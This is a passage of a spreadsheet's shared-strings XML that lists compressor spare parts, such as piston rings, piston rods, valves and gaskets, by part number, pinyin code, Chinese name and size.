  </si>
  <si>
    <t>07010128</t>
  </si>
  <si>
    <t>FP150*2.5</t>
  </si>
  <si>
    <t>150*2.5</t>
  </si>
  <si>
    <t>07010128-1</t>
  </si>
  <si>
    <t>140*2.5</t>
  </si>
  <si>
    <t>07010129</t>
  </si>
  <si>
    <t>FP115*2.5</t>
  </si>
  <si>
    <t>115*2.5</t>
  </si>
  <si>
    <t>07010129-1</t>
  </si>
  <si>
    <t>105*2.5</t>
  </si>
  <si>
    <t>07010130-1</t>
  </si>
  <si>
    <t>80*2.5</t>
  </si>
  <si>
    <t>07010130-2</t>
  </si>
  <si>
    <t>70*2.5</t>
  </si>
  <si>
    <t>07010131</t>
  </si>
  <si>
    <t>LM21-01</t>
  </si>
  <si>
    <t>21-01</t>
  </si>
  <si>
    <t>07010132</t>
  </si>
  <si>
    <t>DJH24-07</t>
  </si>
  <si>
    <t>定距环</t>
  </si>
  <si>
    <t>24-07</t>
  </si>
  <si>
    <t>07010133</t>
  </si>
  <si>
    <t>LM24-01</t>
  </si>
  <si>
    <t>24-01</t>
  </si>
  <si>
    <t>07010134</t>
  </si>
  <si>
    <t>ZDQ24-02</t>
  </si>
  <si>
    <t>制动圏</t>
  </si>
  <si>
    <t>24-02</t>
  </si>
  <si>
    <t>07010135</t>
  </si>
  <si>
    <t>HSH24-05</t>
  </si>
  <si>
    <t>活塞环</t>
  </si>
  <si>
    <t>24-05</t>
  </si>
  <si>
    <t>07010136</t>
  </si>
  <si>
    <t>ZLH24-06</t>
  </si>
  <si>
    <t>24-06</t>
  </si>
  <si>
    <t>07010137</t>
  </si>
  <si>
    <t>GH24-08</t>
  </si>
  <si>
    <t>隔环</t>
  </si>
  <si>
    <t>24-08</t>
  </si>
  <si>
    <t>07010138</t>
  </si>
  <si>
    <t>WDHSG24-09</t>
  </si>
  <si>
    <t>24-09</t>
  </si>
  <si>
    <t>07010140</t>
  </si>
  <si>
    <t>ZLH24-12</t>
  </si>
  <si>
    <t>24-12</t>
  </si>
  <si>
    <t>07010141</t>
  </si>
  <si>
    <t>FL33-02</t>
  </si>
  <si>
    <t>33-02</t>
  </si>
  <si>
    <t>07010142</t>
  </si>
  <si>
    <t>CT03-01</t>
  </si>
  <si>
    <t>03-01</t>
  </si>
  <si>
    <t>07010143</t>
  </si>
  <si>
    <t>ZW03-03</t>
  </si>
  <si>
    <t>03-03</t>
  </si>
  <si>
    <t>07010144</t>
  </si>
  <si>
    <t>LGLM</t>
  </si>
  <si>
    <t>连杆螺母</t>
  </si>
  <si>
    <t>07010145</t>
  </si>
  <si>
    <t>YDZDQ</t>
  </si>
  <si>
    <t>一段制动圏</t>
  </si>
  <si>
    <t>07010146</t>
  </si>
  <si>
    <t>SDZDQ</t>
  </si>
  <si>
    <t>三段制动圈</t>
  </si>
  <si>
    <t>07010147</t>
  </si>
  <si>
    <t>07010148</t>
  </si>
  <si>
    <t>TLH32-05</t>
  </si>
  <si>
    <t>32-05</t>
  </si>
  <si>
    <t>07010149</t>
  </si>
  <si>
    <t>MFH31-03</t>
  </si>
  <si>
    <t>31-03</t>
  </si>
  <si>
    <t>07010150</t>
  </si>
  <si>
    <t>MFH31-06</t>
  </si>
  <si>
    <t>31-06</t>
  </si>
  <si>
    <t>07010151</t>
  </si>
  <si>
    <t>MFH31-07</t>
  </si>
  <si>
    <t>31-07</t>
  </si>
  <si>
    <t>07010152</t>
  </si>
  <si>
    <t>MFH31-08</t>
  </si>
  <si>
    <t>31-08</t>
  </si>
  <si>
    <t>07010153</t>
  </si>
  <si>
    <t>ZCH23-02</t>
  </si>
  <si>
    <t>支撑环</t>
  </si>
  <si>
    <t>23-02</t>
  </si>
  <si>
    <t>07010154</t>
  </si>
  <si>
    <t>LSM16*100</t>
  </si>
  <si>
    <t>螺栓</t>
  </si>
  <si>
    <t>M16*100</t>
  </si>
  <si>
    <t>07010155</t>
  </si>
  <si>
    <t>BM04-03A</t>
  </si>
  <si>
    <t>背帽</t>
  </si>
  <si>
    <t>04-03A</t>
  </si>
  <si>
    <t>07010156</t>
  </si>
  <si>
    <t>D04-06</t>
  </si>
  <si>
    <t>丁</t>
  </si>
  <si>
    <t>04-06</t>
  </si>
  <si>
    <t>07010157</t>
  </si>
  <si>
    <t>D04-10</t>
  </si>
  <si>
    <t>04-10</t>
  </si>
  <si>
    <t>07010158</t>
  </si>
  <si>
    <t>ZLH32-11</t>
  </si>
  <si>
    <t>32-11</t>
  </si>
  <si>
    <t>07010159</t>
  </si>
  <si>
    <t>DWG32-10</t>
  </si>
  <si>
    <t>定位杆</t>
  </si>
  <si>
    <t>32-10</t>
  </si>
  <si>
    <t>07010160</t>
  </si>
  <si>
    <t>YG35-02</t>
  </si>
  <si>
    <t>35-02</t>
  </si>
  <si>
    <t>07010161</t>
  </si>
  <si>
    <t>GYH35-03</t>
  </si>
  <si>
    <t>刮油环</t>
  </si>
  <si>
    <t>35-03</t>
  </si>
  <si>
    <t>07010162</t>
  </si>
  <si>
    <t>SDHSG23-05</t>
  </si>
  <si>
    <t>三段活塞杆</t>
  </si>
  <si>
    <t>23-05</t>
  </si>
  <si>
    <t>07010163</t>
  </si>
  <si>
    <t>YDHSH21-01</t>
  </si>
  <si>
    <t>一段活塞环</t>
  </si>
  <si>
    <t>07010164</t>
  </si>
  <si>
    <t>YDHSG21-04</t>
  </si>
  <si>
    <t>21-04</t>
  </si>
  <si>
    <t>07010165</t>
  </si>
  <si>
    <t>HS直径365</t>
  </si>
  <si>
    <t>活塞</t>
  </si>
  <si>
    <t>直径365</t>
  </si>
  <si>
    <t>07010166</t>
  </si>
  <si>
    <t>HSH22-02</t>
  </si>
  <si>
    <t>22-02</t>
  </si>
  <si>
    <t>07010167</t>
  </si>
  <si>
    <t>EDHSG22-05</t>
  </si>
  <si>
    <t>二段活塞杆</t>
  </si>
  <si>
    <t>22-05</t>
  </si>
  <si>
    <t>07010169</t>
  </si>
  <si>
    <t>HSH23-01</t>
  </si>
  <si>
    <t>23-01</t>
  </si>
  <si>
    <t>07010170</t>
  </si>
  <si>
    <t>QBHS21-02</t>
  </si>
  <si>
    <t>前半活塞</t>
  </si>
  <si>
    <t>21-02</t>
  </si>
  <si>
    <t>07010171</t>
  </si>
  <si>
    <t>HBHS21-03</t>
  </si>
  <si>
    <t>后半活塞</t>
  </si>
  <si>
    <t>21-03</t>
  </si>
  <si>
    <t>07010201</t>
  </si>
  <si>
    <t>MFH32-12</t>
  </si>
  <si>
    <t>32-12</t>
  </si>
  <si>
    <t>07010202</t>
  </si>
  <si>
    <t>MFH32-13</t>
  </si>
  <si>
    <t>32-13</t>
  </si>
  <si>
    <t>07010203</t>
  </si>
  <si>
    <t>JLH31-13</t>
  </si>
  <si>
    <t>31-13</t>
  </si>
  <si>
    <t>07010205</t>
  </si>
  <si>
    <t>TT32-04</t>
  </si>
  <si>
    <t>套筒</t>
  </si>
  <si>
    <t>32-04</t>
  </si>
  <si>
    <t>07010206</t>
  </si>
  <si>
    <t>D24-13-14</t>
  </si>
  <si>
    <t>24-13-14</t>
  </si>
  <si>
    <t>07010207</t>
  </si>
  <si>
    <t>TZD24-15</t>
  </si>
  <si>
    <t>24-15</t>
  </si>
  <si>
    <t>07010208</t>
  </si>
  <si>
    <t>DP31-02</t>
  </si>
  <si>
    <t>31-02</t>
  </si>
  <si>
    <t>07010209</t>
  </si>
  <si>
    <t>MFH31-09</t>
  </si>
  <si>
    <t>31-09</t>
  </si>
  <si>
    <t>07010210</t>
  </si>
  <si>
    <t>MFH31-10</t>
  </si>
  <si>
    <t>31-10</t>
  </si>
  <si>
    <t>07010211</t>
  </si>
  <si>
    <t>ZDQ14-14</t>
  </si>
  <si>
    <t>14-14</t>
  </si>
  <si>
    <t>07010212</t>
  </si>
  <si>
    <t>HT89A-00</t>
  </si>
  <si>
    <t>护套</t>
  </si>
  <si>
    <t>89A-00</t>
  </si>
  <si>
    <t>07010213</t>
  </si>
  <si>
    <t>SDHSG24-17</t>
  </si>
  <si>
    <t>四段活塞杆</t>
  </si>
  <si>
    <t>24-17</t>
  </si>
  <si>
    <t>07010214</t>
  </si>
  <si>
    <t>PYQ02-03</t>
  </si>
  <si>
    <t>抛油圏</t>
  </si>
  <si>
    <t>02-03</t>
  </si>
  <si>
    <t>07010215</t>
  </si>
  <si>
    <t>SZTT04-01A</t>
  </si>
  <si>
    <t>04-01A</t>
  </si>
  <si>
    <t>07010216</t>
  </si>
  <si>
    <t>LG04-08</t>
  </si>
  <si>
    <t>螺杆</t>
  </si>
  <si>
    <t>04-08</t>
  </si>
  <si>
    <t>07010217</t>
  </si>
  <si>
    <t>OXQ500#</t>
  </si>
  <si>
    <t>500#</t>
  </si>
  <si>
    <t>07010218-1</t>
  </si>
  <si>
    <t>DSM20*80</t>
  </si>
  <si>
    <t>M20*80</t>
  </si>
  <si>
    <t>07010218-2</t>
  </si>
  <si>
    <t>DSM24*75</t>
  </si>
  <si>
    <t>M24*75</t>
  </si>
  <si>
    <t>07010218-3</t>
  </si>
  <si>
    <t>DSM30*90</t>
  </si>
  <si>
    <t>M30*90</t>
  </si>
  <si>
    <t>07010218-4</t>
  </si>
  <si>
    <t>M16*80</t>
  </si>
  <si>
    <t>07010218-5</t>
  </si>
  <si>
    <t>DSM48*100</t>
  </si>
  <si>
    <t>M48*100</t>
  </si>
  <si>
    <t>07010219</t>
  </si>
  <si>
    <t>TLH4M12(9)</t>
  </si>
  <si>
    <t>07010220</t>
  </si>
  <si>
    <t>JLH31-01</t>
  </si>
  <si>
    <t>节流盒</t>
  </si>
  <si>
    <t>31-01</t>
  </si>
  <si>
    <t>07010221</t>
  </si>
  <si>
    <t>FG11-04</t>
  </si>
  <si>
    <t>11-04</t>
  </si>
  <si>
    <t>07010222</t>
  </si>
  <si>
    <t>ZDQ</t>
  </si>
  <si>
    <t>07010223</t>
  </si>
  <si>
    <t>TLZJ</t>
  </si>
  <si>
    <t>填料组件</t>
  </si>
  <si>
    <t>07010224</t>
  </si>
  <si>
    <t>PCZ99-14</t>
  </si>
  <si>
    <t>盘车轴</t>
  </si>
  <si>
    <t>99-14</t>
  </si>
  <si>
    <t>07010225</t>
  </si>
  <si>
    <t>TH24*0.8</t>
  </si>
  <si>
    <t>24*0.8</t>
  </si>
  <si>
    <t>07010226</t>
  </si>
  <si>
    <t>SZTX04-09</t>
  </si>
  <si>
    <t>十字头销</t>
  </si>
  <si>
    <t>04-09</t>
  </si>
  <si>
    <t>07010227</t>
  </si>
  <si>
    <t>DAM24-10</t>
  </si>
  <si>
    <t>垫凹面</t>
  </si>
  <si>
    <t>24-10</t>
  </si>
  <si>
    <t>07010228</t>
  </si>
  <si>
    <t>DTM24-11</t>
  </si>
  <si>
    <t>垫凸面</t>
  </si>
  <si>
    <t>24-11</t>
  </si>
  <si>
    <t>07010229</t>
  </si>
  <si>
    <t>LSM20*110</t>
  </si>
  <si>
    <t>07010230</t>
  </si>
  <si>
    <t>DJH24-15</t>
  </si>
  <si>
    <t>07010231</t>
  </si>
  <si>
    <t>HSH24-13</t>
  </si>
  <si>
    <t>24-13</t>
  </si>
  <si>
    <t>07010232</t>
  </si>
  <si>
    <t>X31-12</t>
  </si>
  <si>
    <t>销</t>
  </si>
  <si>
    <t>31-12</t>
  </si>
  <si>
    <t>07010233</t>
  </si>
  <si>
    <t>ZC01-21</t>
  </si>
  <si>
    <t>轴承</t>
  </si>
  <si>
    <t>01-21</t>
  </si>
  <si>
    <t>07010234</t>
  </si>
  <si>
    <t>ZC01-22</t>
  </si>
  <si>
    <t>01-22</t>
  </si>
  <si>
    <t>07010235</t>
  </si>
  <si>
    <t>ZC01-23</t>
  </si>
  <si>
    <t>01-23</t>
  </si>
  <si>
    <t>07010237</t>
  </si>
  <si>
    <t>TLH32-02</t>
  </si>
  <si>
    <t>32-02</t>
  </si>
  <si>
    <t>07010238</t>
  </si>
  <si>
    <t>ZCH21-05</t>
  </si>
  <si>
    <t>21-05</t>
  </si>
  <si>
    <t>07010239</t>
  </si>
  <si>
    <t>ZCH22-03</t>
  </si>
  <si>
    <t>22-03</t>
  </si>
  <si>
    <t>07010240</t>
  </si>
  <si>
    <t>GB13-06</t>
  </si>
  <si>
    <t>盖板</t>
  </si>
  <si>
    <t>13-06</t>
  </si>
  <si>
    <t>07010241</t>
  </si>
  <si>
    <t>TT14-02</t>
  </si>
  <si>
    <t>铜套</t>
  </si>
  <si>
    <t>14-02</t>
  </si>
  <si>
    <t>07010242</t>
  </si>
  <si>
    <t>GH24-14</t>
  </si>
  <si>
    <t>24-14</t>
  </si>
  <si>
    <t>07010243</t>
  </si>
  <si>
    <t>D21-02</t>
  </si>
  <si>
    <t>07010244</t>
  </si>
  <si>
    <t>MFQ04-12</t>
  </si>
  <si>
    <t>04-12</t>
  </si>
  <si>
    <t>07010245</t>
  </si>
  <si>
    <t>TH31-11</t>
  </si>
  <si>
    <t>31-11</t>
  </si>
  <si>
    <t>07010246</t>
  </si>
  <si>
    <t>LS03-02</t>
  </si>
  <si>
    <t>03-02</t>
  </si>
  <si>
    <t>07010247</t>
  </si>
  <si>
    <t>LM24-18</t>
  </si>
  <si>
    <t>24-18</t>
  </si>
  <si>
    <t>07010248</t>
  </si>
  <si>
    <t>ZCHBJ24A-00</t>
  </si>
  <si>
    <t>支撑环部件</t>
  </si>
  <si>
    <t>24A-00</t>
  </si>
  <si>
    <t>07010249</t>
  </si>
  <si>
    <t>DWH、CT99-13</t>
  </si>
  <si>
    <t>定位环、衬套</t>
  </si>
  <si>
    <t>99-13</t>
  </si>
  <si>
    <t>07010250</t>
  </si>
  <si>
    <t>JLH32-14</t>
  </si>
  <si>
    <t>32-14</t>
  </si>
  <si>
    <t>07010251</t>
  </si>
  <si>
    <t>D04-13</t>
  </si>
  <si>
    <t>04-13</t>
  </si>
  <si>
    <t>07010253</t>
  </si>
  <si>
    <t>OXQ直径500</t>
  </si>
  <si>
    <t>直径500</t>
  </si>
  <si>
    <t>07010255</t>
  </si>
  <si>
    <t>ZCT31-16</t>
  </si>
  <si>
    <t>支撑套</t>
  </si>
  <si>
    <t>31-16</t>
  </si>
  <si>
    <t>07010256</t>
  </si>
  <si>
    <t>JL99-20B</t>
  </si>
  <si>
    <t>棘轮</t>
  </si>
  <si>
    <t>99-20B</t>
  </si>
  <si>
    <t>07010257</t>
  </si>
  <si>
    <t>JZ99-09C</t>
  </si>
  <si>
    <t>棘爪</t>
  </si>
  <si>
    <t>99-09C</t>
  </si>
  <si>
    <t>07010258</t>
  </si>
  <si>
    <t>ZCH24A-01</t>
  </si>
  <si>
    <t>24A-01</t>
  </si>
  <si>
    <t>07010259</t>
  </si>
  <si>
    <t>KB842-06</t>
  </si>
  <si>
    <t>孔板</t>
  </si>
  <si>
    <t>842-06</t>
  </si>
  <si>
    <t>07010260</t>
  </si>
  <si>
    <t>KB14-15</t>
  </si>
  <si>
    <t>14-15</t>
  </si>
  <si>
    <t>07010261</t>
  </si>
  <si>
    <t>KB852-09</t>
  </si>
  <si>
    <t>852-09</t>
  </si>
  <si>
    <t>07010262</t>
  </si>
  <si>
    <t>EDZDQ11-02</t>
  </si>
  <si>
    <t>二段制动圏</t>
  </si>
  <si>
    <t>11-02</t>
  </si>
  <si>
    <t>07010264</t>
  </si>
  <si>
    <t>LS55-03</t>
  </si>
  <si>
    <t>55-03</t>
  </si>
  <si>
    <t>07010265</t>
  </si>
  <si>
    <t>07010266</t>
  </si>
  <si>
    <t>DSD</t>
  </si>
  <si>
    <t>顶丝垫</t>
  </si>
  <si>
    <t>07010267</t>
  </si>
  <si>
    <t>SSQ20A-00</t>
  </si>
  <si>
    <t>试水器</t>
  </si>
  <si>
    <t>20A-00</t>
  </si>
  <si>
    <t>07010268</t>
  </si>
  <si>
    <t>XZG86*80</t>
  </si>
  <si>
    <t>G86*80</t>
  </si>
  <si>
    <t>07010269</t>
  </si>
  <si>
    <t>FL24-18</t>
  </si>
  <si>
    <t>07010315</t>
  </si>
  <si>
    <t>YDHSG21-02</t>
  </si>
  <si>
    <t>07010316</t>
  </si>
  <si>
    <t>EDHSG22-04</t>
  </si>
  <si>
    <t>22-04</t>
  </si>
  <si>
    <t>07010317</t>
  </si>
  <si>
    <t>SDHSG23-01</t>
  </si>
  <si>
    <t>07010318</t>
  </si>
  <si>
    <t>HSG24-07</t>
  </si>
  <si>
    <t>07010319</t>
  </si>
  <si>
    <t>SDHSG24-15</t>
  </si>
  <si>
    <t>07010320</t>
  </si>
  <si>
    <t>HSH21-04</t>
  </si>
  <si>
    <t>07010321</t>
  </si>
  <si>
    <t>07010322</t>
  </si>
  <si>
    <t>HSH23-05</t>
  </si>
  <si>
    <t>07010324</t>
  </si>
  <si>
    <t>HSH24-11</t>
  </si>
  <si>
    <t>07010325</t>
  </si>
  <si>
    <t>ZCH21-03</t>
  </si>
  <si>
    <t>07010326</t>
  </si>
  <si>
    <t>ZCH22-05</t>
  </si>
  <si>
    <t>07010328</t>
  </si>
  <si>
    <t>ZCH24-08</t>
  </si>
  <si>
    <t>07010330</t>
  </si>
  <si>
    <t>YDFZ51-00</t>
  </si>
  <si>
    <t>51-00</t>
  </si>
  <si>
    <t>07010331</t>
  </si>
  <si>
    <t>EDFZ52-00/42-00</t>
  </si>
  <si>
    <t>52-00/42-00</t>
  </si>
  <si>
    <t>07010333</t>
  </si>
  <si>
    <t>SDFZ44-00</t>
  </si>
  <si>
    <t>44-00</t>
  </si>
  <si>
    <t>07010334</t>
  </si>
  <si>
    <t>SDFZ54-00</t>
  </si>
  <si>
    <t>54-00</t>
  </si>
  <si>
    <t>07010336</t>
  </si>
  <si>
    <t>WDHST24-03</t>
  </si>
  <si>
    <t>五段活塞体</t>
  </si>
  <si>
    <t>24-03</t>
  </si>
  <si>
    <t>07010337</t>
  </si>
  <si>
    <t>H24-13</t>
  </si>
  <si>
    <t>07010338</t>
  </si>
  <si>
    <t>07010339</t>
  </si>
  <si>
    <t>07010340</t>
  </si>
  <si>
    <t>HS直径220</t>
  </si>
  <si>
    <t>直径220</t>
  </si>
  <si>
    <t>07010341</t>
  </si>
  <si>
    <t>ZLH24-10</t>
  </si>
  <si>
    <t>07010342</t>
  </si>
  <si>
    <t>D4M12-13</t>
  </si>
  <si>
    <t>4M12-13</t>
  </si>
  <si>
    <t>07010343-1</t>
  </si>
  <si>
    <t>TH41-07</t>
  </si>
  <si>
    <t>41-07</t>
  </si>
  <si>
    <t>07010344</t>
  </si>
  <si>
    <t>STLS</t>
  </si>
  <si>
    <t>07010345</t>
  </si>
  <si>
    <t>D4M12F</t>
  </si>
  <si>
    <t>4M12F</t>
  </si>
  <si>
    <t>07010346</t>
  </si>
  <si>
    <t>BXGD</t>
  </si>
  <si>
    <t>不锈钢垫</t>
  </si>
  <si>
    <t>07010347</t>
  </si>
  <si>
    <t>ZCH24-04</t>
  </si>
  <si>
    <t>24-04</t>
  </si>
  <si>
    <t>07010348</t>
  </si>
  <si>
    <t>HSH24-05、24-06</t>
  </si>
  <si>
    <t>24-05、24-06</t>
  </si>
  <si>
    <t>07010901</t>
  </si>
  <si>
    <t>DH85压缩机</t>
  </si>
  <si>
    <t>垫环</t>
  </si>
  <si>
    <t>85压缩机</t>
  </si>
  <si>
    <t>07010902</t>
  </si>
  <si>
    <t>HST</t>
  </si>
  <si>
    <t>活塞体</t>
  </si>
  <si>
    <t>4M16C-17-01-00</t>
  </si>
  <si>
    <t>07010903</t>
  </si>
  <si>
    <t>MFQ280*8.6</t>
  </si>
  <si>
    <t>280*8.6</t>
  </si>
  <si>
    <t>07010905</t>
  </si>
  <si>
    <t>WJZCH4M12H-19-3</t>
  </si>
  <si>
    <t>五级支撑环</t>
  </si>
  <si>
    <t>4M12H-19-3</t>
  </si>
  <si>
    <t>07010906</t>
  </si>
  <si>
    <t>WJHSH4M16E-19-1</t>
  </si>
  <si>
    <t>五级活塞环</t>
  </si>
  <si>
    <t>4M16E-19-1</t>
  </si>
  <si>
    <t>07010907</t>
  </si>
  <si>
    <t>HSH4M16E-16-2</t>
  </si>
  <si>
    <t>4M16E-16-2</t>
  </si>
  <si>
    <t>07010908</t>
  </si>
  <si>
    <t>ZLH4M16E-16-3</t>
  </si>
  <si>
    <t>涨力环</t>
  </si>
  <si>
    <t>4M16E-16-3</t>
  </si>
  <si>
    <t>07010909</t>
  </si>
  <si>
    <t>YJZCH4M16E-16-1</t>
  </si>
  <si>
    <t>一级支撑环</t>
  </si>
  <si>
    <t>4M16E-16-1</t>
  </si>
  <si>
    <t>07010910</t>
  </si>
  <si>
    <t>LM2AD16-17-1</t>
  </si>
  <si>
    <t>2AD16-17-1</t>
  </si>
  <si>
    <t>07010911</t>
  </si>
  <si>
    <t>HSH4M16C-17-1</t>
  </si>
  <si>
    <t>4M16C-17-1</t>
  </si>
  <si>
    <t>07010912</t>
  </si>
  <si>
    <t>LD2AD16A-16-1</t>
  </si>
  <si>
    <t>2AD16A-16-1</t>
  </si>
  <si>
    <t>07010913</t>
  </si>
  <si>
    <t>SJHSH4M16C-18-1</t>
  </si>
  <si>
    <t>三级活塞环</t>
  </si>
  <si>
    <t>4M16C-18-1</t>
  </si>
  <si>
    <t>07010914</t>
  </si>
  <si>
    <t>BCH4M20-19-4</t>
  </si>
  <si>
    <t>补偿环</t>
  </si>
  <si>
    <t>4M20-19-4</t>
  </si>
  <si>
    <t>07010915-1</t>
  </si>
  <si>
    <t>TMD4M20C-19-3</t>
  </si>
  <si>
    <t>凸面垫</t>
  </si>
  <si>
    <t>4M20C-19-3</t>
  </si>
  <si>
    <t>07010915-2</t>
  </si>
  <si>
    <t>AMD4M20C-19-5</t>
  </si>
  <si>
    <t>凹面垫</t>
  </si>
  <si>
    <t>4M20C-19-5</t>
  </si>
  <si>
    <t>07010918</t>
  </si>
  <si>
    <t>GDG2D16-5-6</t>
  </si>
  <si>
    <t>固定盖</t>
  </si>
  <si>
    <t>2D16-5-6</t>
  </si>
  <si>
    <t>07010919</t>
  </si>
  <si>
    <t>WJHSH4M12H-19-2</t>
  </si>
  <si>
    <t>4M12H-19-2</t>
  </si>
  <si>
    <t>07010920</t>
  </si>
  <si>
    <t>CL2D16-3-3-9</t>
  </si>
  <si>
    <t>2D16-3-3-9</t>
  </si>
  <si>
    <t>07010922</t>
  </si>
  <si>
    <t>HK2D16-3-35</t>
  </si>
  <si>
    <t>滑块</t>
  </si>
  <si>
    <t>2D16-3-35</t>
  </si>
  <si>
    <t>07010923</t>
  </si>
  <si>
    <t>07010924</t>
  </si>
  <si>
    <t>FP、HCP</t>
  </si>
  <si>
    <t>阀片、缓冲片</t>
  </si>
  <si>
    <t>07010925</t>
  </si>
  <si>
    <t>SCDP</t>
  </si>
  <si>
    <t>升程垫片</t>
  </si>
  <si>
    <t>07010926</t>
  </si>
  <si>
    <t>HL2D16A-5-02-00</t>
  </si>
  <si>
    <t>滑履</t>
  </si>
  <si>
    <t>2D16A-5-02-00</t>
  </si>
  <si>
    <t>07010927</t>
  </si>
  <si>
    <t>YJDQ284*270</t>
  </si>
  <si>
    <t>一级垫圈</t>
  </si>
  <si>
    <t>284*270</t>
  </si>
  <si>
    <t>07010928</t>
  </si>
  <si>
    <t>TZK2D16-5-3</t>
  </si>
  <si>
    <t>调整块</t>
  </si>
  <si>
    <t>2D16-5-3</t>
  </si>
  <si>
    <t>07010929</t>
  </si>
  <si>
    <t>WJFD4M12B-15-21</t>
  </si>
  <si>
    <t>五级阀垫</t>
  </si>
  <si>
    <t>4M12B-15-21</t>
  </si>
  <si>
    <t>07010932-3</t>
  </si>
  <si>
    <t>SJJQF4M16E-74-00</t>
  </si>
  <si>
    <t>三级进气阀</t>
  </si>
  <si>
    <t>4M16E-74-00</t>
  </si>
  <si>
    <t>07010932-5</t>
  </si>
  <si>
    <t>SJJQF4M16E-76-00</t>
  </si>
  <si>
    <t>四级进气阀</t>
  </si>
  <si>
    <t>4M16E-76-00</t>
  </si>
  <si>
    <t>07010932-6</t>
  </si>
  <si>
    <t>SJPQF4M16E-77-00</t>
  </si>
  <si>
    <t>四级排气阀</t>
  </si>
  <si>
    <t>4M16E-77-00</t>
  </si>
  <si>
    <t>07010933-1</t>
  </si>
  <si>
    <t>WJJQF4M16E-78-00</t>
  </si>
  <si>
    <t>五级进气阀</t>
  </si>
  <si>
    <t>4M16E-78-00</t>
  </si>
  <si>
    <t>07010935</t>
  </si>
  <si>
    <t>HSG2AD16C-17-1</t>
  </si>
  <si>
    <t>2AD16C-17-1</t>
  </si>
  <si>
    <t>07010936</t>
  </si>
  <si>
    <t>SJHSG4M16C-18-2</t>
  </si>
  <si>
    <t>三级活塞杆</t>
  </si>
  <si>
    <t>4M16C-18-2</t>
  </si>
  <si>
    <t>07010937</t>
  </si>
  <si>
    <t>SJHSG4M16C-19-5</t>
  </si>
  <si>
    <t>四级活塞杆</t>
  </si>
  <si>
    <t>4M16C-19-5</t>
  </si>
  <si>
    <t>07010938-1</t>
  </si>
  <si>
    <t>MFQ4M16B-29-02-00</t>
  </si>
  <si>
    <t>4M16B-29-02-00</t>
  </si>
  <si>
    <t>07010938-5</t>
  </si>
  <si>
    <t>GYH2D16A-7-11</t>
  </si>
  <si>
    <t>2D16A-7-11</t>
  </si>
  <si>
    <t>07010939</t>
  </si>
  <si>
    <t>OXQ4M16B28-3</t>
  </si>
  <si>
    <t>4M16B28-3</t>
  </si>
  <si>
    <t>07010940</t>
  </si>
  <si>
    <t>JGQ4M16B-28-1</t>
  </si>
  <si>
    <t>间隔圏</t>
  </si>
  <si>
    <t>4M16B-28-1</t>
  </si>
  <si>
    <t>07010941</t>
  </si>
  <si>
    <t>MFQ28-03-00</t>
  </si>
  <si>
    <t>28-03-00</t>
  </si>
  <si>
    <t>07010943</t>
  </si>
  <si>
    <t>TL2D16A-8-3</t>
  </si>
  <si>
    <t>2D16A-8-3</t>
  </si>
  <si>
    <t>07010944</t>
  </si>
  <si>
    <t>TH2D16A-7-10</t>
  </si>
  <si>
    <t>2D16A-7-10</t>
  </si>
  <si>
    <t>07010945</t>
  </si>
  <si>
    <t>DP2D16A-7-3</t>
  </si>
  <si>
    <t>2D16A-7-3</t>
  </si>
  <si>
    <t>07010948</t>
  </si>
  <si>
    <t>ZCH4M16F-19-4</t>
  </si>
  <si>
    <t>4M16F-19-4</t>
  </si>
  <si>
    <t>07010949</t>
  </si>
  <si>
    <t>HSH4M16F-19-3</t>
  </si>
  <si>
    <t>4M16F-19-3</t>
  </si>
  <si>
    <t>07010952</t>
  </si>
  <si>
    <t>LM2D16A-4-1</t>
  </si>
  <si>
    <t>2D16A-4-1</t>
  </si>
  <si>
    <t>07010953</t>
  </si>
  <si>
    <t>LGLS2D16A-4-3</t>
  </si>
  <si>
    <t>连杆螺栓</t>
  </si>
  <si>
    <t>2D16A-4-3</t>
  </si>
  <si>
    <t>07010954</t>
  </si>
  <si>
    <t>LGLM2D16A-4-2</t>
  </si>
  <si>
    <t>2D16A-4-2</t>
  </si>
  <si>
    <t>07010955</t>
  </si>
  <si>
    <t>FL2D16A-5-4</t>
  </si>
  <si>
    <t>2D16A-5-4</t>
  </si>
  <si>
    <t>07010956</t>
  </si>
  <si>
    <t>ZDDQ标5-5 42</t>
  </si>
  <si>
    <t>止动垫圈</t>
  </si>
  <si>
    <t>标5-5 42</t>
  </si>
  <si>
    <t>07010957</t>
  </si>
  <si>
    <t>07010957-1</t>
  </si>
  <si>
    <t>DSM</t>
  </si>
  <si>
    <t>顶丝帽</t>
  </si>
  <si>
    <t>30*3.5</t>
  </si>
  <si>
    <t>07010958</t>
  </si>
  <si>
    <t>LD314*296</t>
  </si>
  <si>
    <t>铝垫</t>
  </si>
  <si>
    <t>314*296</t>
  </si>
  <si>
    <t>07010958*6</t>
  </si>
  <si>
    <t>LD31*40*1</t>
  </si>
  <si>
    <t>31*40*1</t>
  </si>
  <si>
    <t>07010958-2</t>
  </si>
  <si>
    <t>LD270*254*2</t>
  </si>
  <si>
    <t>270*254*2</t>
  </si>
  <si>
    <t>07010958-3</t>
  </si>
  <si>
    <t>LD235*220*2</t>
  </si>
  <si>
    <t>235*220*2</t>
  </si>
  <si>
    <t>07010958-4</t>
  </si>
  <si>
    <t>LD28*40*1</t>
  </si>
  <si>
    <t>28*40*1</t>
  </si>
  <si>
    <t>07010958-7</t>
  </si>
  <si>
    <t>LD138*122*2</t>
  </si>
  <si>
    <t>138*122*2</t>
  </si>
  <si>
    <t>07010958-8</t>
  </si>
  <si>
    <t>LD102*110*1</t>
  </si>
  <si>
    <t>102*110*1</t>
  </si>
  <si>
    <t>07010959</t>
  </si>
  <si>
    <t>52*28*3</t>
  </si>
  <si>
    <t>07010959-1</t>
  </si>
  <si>
    <t>LD46*31*1</t>
  </si>
  <si>
    <t>46*31*1</t>
  </si>
  <si>
    <t>07010959-2</t>
  </si>
  <si>
    <t>LD134*125*2</t>
  </si>
  <si>
    <t>134*125*2</t>
  </si>
  <si>
    <t>07010959-3</t>
  </si>
  <si>
    <t>LD428*410*5</t>
  </si>
  <si>
    <t>428*410*5</t>
  </si>
  <si>
    <t>07010959-4</t>
  </si>
  <si>
    <t>LD204*195*2</t>
  </si>
  <si>
    <t>204*195*2</t>
  </si>
  <si>
    <t>07010959-5</t>
  </si>
  <si>
    <t>LD244*230*2</t>
  </si>
  <si>
    <t>244*230*2</t>
  </si>
  <si>
    <t>07010959-6</t>
  </si>
  <si>
    <t>LD284*270*2</t>
  </si>
  <si>
    <t>284*270*2</t>
  </si>
  <si>
    <t>07010959-7</t>
  </si>
  <si>
    <t>LD162*151*1</t>
  </si>
  <si>
    <t>162*151*1</t>
  </si>
  <si>
    <t>07010961</t>
  </si>
  <si>
    <t>TLZ</t>
  </si>
  <si>
    <t>填料座</t>
  </si>
  <si>
